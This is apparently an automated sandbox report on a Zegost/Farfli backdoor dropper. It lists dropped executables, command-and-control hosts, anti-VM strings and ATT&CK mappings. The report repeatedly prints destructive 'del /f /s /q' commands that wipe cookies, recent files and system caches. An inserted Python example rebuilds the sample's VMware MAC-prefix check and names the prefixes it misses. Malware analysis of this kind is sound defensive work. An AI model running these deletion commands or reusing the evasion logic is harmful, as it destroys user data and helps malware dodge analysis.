Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,3_2_1000AA30
Source: C:\Windows\Temp\v5.exe | Code function: 2_2_00406090 6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,2_2_00406090
Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 180000 ms (3 minutes)
Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 60000 ms (1 minute)
Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 180000 ms (3 minutes)
Source: C:\Windows\Temp\server.exe | Thread delayed: delay time: 1200000 ms (20 minutes; behaviour after a sleep this long is only observed if the analysis runtime exceeds it)
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user
Source: server.exe, 00000003.00000002.3288563032.000000000048D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh-|%SystemRoot%\system32\mswsock.dllu
Source: .exe.0.dr | Binary or memory string: 00-50-56 VMWare, Inc.
Source: .exe, 00000005.00000003.1413768586.00000000027EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00-0C-29 VMware, Inc.)
Source: .exe.0.dr | Binary or memory string: 00-1C-14 VMware, Inc
Source: .exe.0.dr | Binary or memory string: 00-0C-29 VMware, Inc.
Source: v5.exe, 00000004.00000003.1995685652.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2542629725.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.3205650213.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2424630917.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2828856783.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2752766091.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2301742269.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.3338719356.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2301597675.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2289452448.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2597998486.00000000007BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: .exe.0.dr | Binary or memory string: 00-05-69 VMWARE, Inc.
Source: v5.exe, 00000002.00000002.1383867254.000000000065D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
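Two different things are mixed in the strings above. The "Hyper-V RAW" strings sit next to the mswsock.dll path because that is the name of the AF_HYPERV Winsock provider in the catalog, which is present on physical Windows hosts as well, so on its own it says nothing about virtualisation. The four "xx-xx-xx VMware" strings in the dropped " .exe" are an embedded OUI table, the classic MAC-prefix check, and v5.exe's call to GetAdaptersInfo (listed earlier) is where adapter MACs would come from. The table covers only VMware-registered prefixes (00:05:69, 00:0C:29, 00:1C:14, 00:50:56): there is no entry for VirtualBox (08:00:27), Hyper-V (00:15:5D) or QEMU/KVM (52:54:00), so an analysis VM on one of those, or a VMware guest with a manually assigned MAC, passes this particular check. The following is an added example written for this page, not code from the report or from the sample; it rebuilds the check from the page's own strings so the logic can be exercised against arbitrary adapter lists.

```python
import re

# The vendor-prefix strings this report recovered from the dropped " .exe",
# re-typed here as constructed sample input.
VENDOR_STRINGS = [
    "00-50-56 VMWare, Inc.",
    "00-0C-29 VMware, Inc.",
    "00-1C-14 VMware, Inc",
    "00-05-69 VMWARE, Inc.",
]

# "xx-xx-xx Vendor label" lines; anything else is ignored.
OUI_LINE = re.compile(r"^\s*([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})\s+(.+?)\s*$")


def parse_oui_table(lines):
    """Map a 3-byte OUI to its vendor label."""
    table = {}
    for line in lines:
        m = OUI_LINE.match(line)
        if m:
            table[bytes.fromhex("".join(m.group(1, 2, 3)))] = m.group(4)
    return table


def normalize_mac(mac):
    """Accept 00-0C-29-..., 00:0c:29:..., 000c29... or 6 raw bytes; return the 6 bytes."""
    if isinstance(mac, (bytes, bytearray)):
        raw = bytes(mac)
    else:
        raw = bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", mac))
    if len(raw) != 6:
        raise ValueError("not a 48-bit MAC: %r" % (mac,))
    return raw


def vendor_for(mac, table):
    """Vendor label if the MAC's first three bytes are in the table, else None."""
    return table.get(normalize_mac(mac)[:3])


def vm_adapters(adapter_macs, table):
    """What the sample's adapter loop amounts to: every adapter whose OUI is listed.

    An empty result means this check would report "not a VM", even on a
    hypervisor whose prefix is simply missing from the table.
    """
    return [(mac, vendor_for(mac, table)) for mac in adapter_macs if vendor_for(mac, table)]
```

Feed `vm_adapters()` the MACs of an analysis box to see whether this sample's table would have caught it; a sandbox operator can invert the same function to pick an adapter prefix the table does not know.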
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | API call chain: ExitProcess graph end node (graph_0-3101)
Source: C:\Windows\Temp\v5.exe | API call chain: ExitProcess graph end node (graph_2-1410)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-20249)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-20270)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-20256)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-20272)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-19946)
Source: C:\Windows\Temp\server.exe | API call chain: ExitProcess graph end node (graph_3-19489)
Source: C:\Windows\Temp\server.exe | Process information queried: ProcessInformation
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000F3A0 BlockInput,BlockInput,3_2_1000F3A0
Source: C:\Windows\Temp\server.exe | Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
Source: C:\Windows\Temp\server.exe | Code function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,3_2_00401000
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0044F257 SetUnhandledExceptionFilter,5_2_0044F257
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0044F26B SetUnhandledExceptionFilter,5_2_0044F26B
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,3_2_1000F840
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,5_2_00401680
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10025DC0 cpuid 3_2_10025DC0
Source: C:\Windows\Temp\ .exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,5_2_0045F814
Source: C:\Windows\Temp\ .exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,5_2_00401060
Source: C:\Windows\Temp\ .exe | Code function: GetLocaleInfoA,5_2_00451400
Source: C:\Windows\Temp\ .exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\Temp\ .exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\v5.exe | Code function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6CFC6DE0,6CFC6DE0,LoadLibraryA,6CFC6DE0,LoadLibraryA,6CFC6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep,2_2_00402AD0
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,3_2_10007070
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA,5_2_00433020
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF
Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: kxetray.exe
Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: KSafeTray.exe
Source: server.exe, server.exe, 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 360tray.exe
Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 7708, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 7708, type: MEMORYSTR
ATT&CK tactics with the techniques flagged for this sample (number in parentheses is the signature-count marker shown in the report; unflagged matrix cells omitted):

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: none flagged
Execution: Windows Management Instrumentation (2); Native API (12); Command and Scripting Interpreter (2); Service Execution (12)
Persistence: DLL Side-Loading (1); Windows Service (13); Registry Run Keys / Startup Folder (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (13); Process Injection (12); Registry Run Keys / Startup Folder (1)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); Software Packing (1); DLL Side-Loading (1); File Deletion (11); Masquerading (2); Virtualization/Sandbox Evasion (231); Access Token Manipulation (1); Process Injection (12); Indicator Removal (1)
Credential Access: Input Capture (121)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (65); Network Share Discovery (1); Security Software Discovery (361); Virtualization/Sandbox Evasion (231); Process Discovery (12); Application Window Discovery (11); System Owner/User Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (1); Input Capture (121); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (21); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1)
Exfiltration: none flagged
Impact: System Shutdown/Reboot (1)
Behavior Graph ID: 1579781 | Sample: G3izWAY3Fa.exe | Startdate: 23/12/2024 | Architecture: WINDOWS | Score: 78

Start
  DNS/IP: chinagov.8800.org
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 9 other signatures
  Started: G3izWAY3Fa.exe; v5.exe
G3izWAY3Fa.exe
  Dropped: C:\Windows\Temp\v5.exe (PE32); C:\Windows\Temp\server.exe (PE32); C:\Windows\Temp\ .exe (PE32)
  Started: server.exe; v5.exe;  .exe
v5.exe (started from Start)
  DNS/IP: chinagov.8800.org 93.46.8.90, ports 49761, 49841, 49928, FASTWEBIT Italy; 192.168.2.1, port 80, unknown unknown
server.exe (started by G3izWAY3Fa.exe)
  DNS/IP: 120.48.34.233, ports 49717, 49723, 49770, CHINANET-BACKBONENo31Jin-rongStreetCN China
  Dropped: C:\Windows\XXXXXX05CA35CC\svchsot.exe (PE32)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
v5.exe (started by G3izWAY3Fa.exe)
  Signatures: Contains functionality to enumerate network shares of other devices; Found evasive API chain (may stop execution after checking mutex); Deletes itself after installation
  Started: cmd.exe -> conhost.exe
 .exe (started by G3izWAY3Fa.exe)
  Started: cmd.exe -> conhost.exe (3 instances); 45 other processes -> conhost.exe (3 instances), 42 other processes

Source | Detection | Scanner | Label
G3izWAY3Fa.exe | 87% | ReversingLabs | Win32.Backdoor.Zegost
G3izWAY3Fa.exe | 100% | Avira | HEUR/AGEN.1337945

Source | Detection | Scanner | Label
C:\Windows\XXXXXX05CA35CC\svchsot.exe | 100% | Avira | BDS/Zegost.birna
C:\Windows\Temp\server.exe | 100% | Avira | BDS/Zegost.birna
C:\Windows\Temp\v5.exe | 100% | Avira | TR/Staser.apzjs
C:\Windows\XXXXXX05CA35CC\svchsot.exe | 100% | Joe Sandbox ML | -
C:\Windows\Temp\server.exe | 100% | Joe Sandbox ML | -
C:\Windows\Temp\v5.exe | 100% | Joe Sandbox ML | -
C:\Windows\Temp\ .exe | 4% | ReversingLabs | -
C:\Windows\Temp\server.exe | 95% | ReversingLabs | Win32.Backdoor.Farfli
C:\Windows\Temp\v5.exe | 100% | ReversingLabs | Win32.Trojan.MintZard
C:\Windows\XXXXXX05CA35CC\svchsot.exe | 95% | ReversingLabs | Win32.Backdoor.Farfli
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
chinagov.8800.org | 93.46.8.90 | true | true | - | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://192.168.2.1 | v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://nsis.sf.net/NSIS_Error | G3izWAY3Fa.exe | false | - | high
https://deff.nelreports.net/api/report?cat=msn |  .exe, 00000005.00000002.3268535550.000000000224B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | G3izWAY3Fa.exe | false | - | high
http://192.168.2.1/ | v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
http://192.168.2.1/& | v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
120.48.34.233 | unknown | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | true
93.46.8.90 | chinagov.8800.org | Italy | 12874 | FASTWEBIT | true

IP
192.168.2.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579781
Start date and time: 2024-12-23 09:12:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 26s
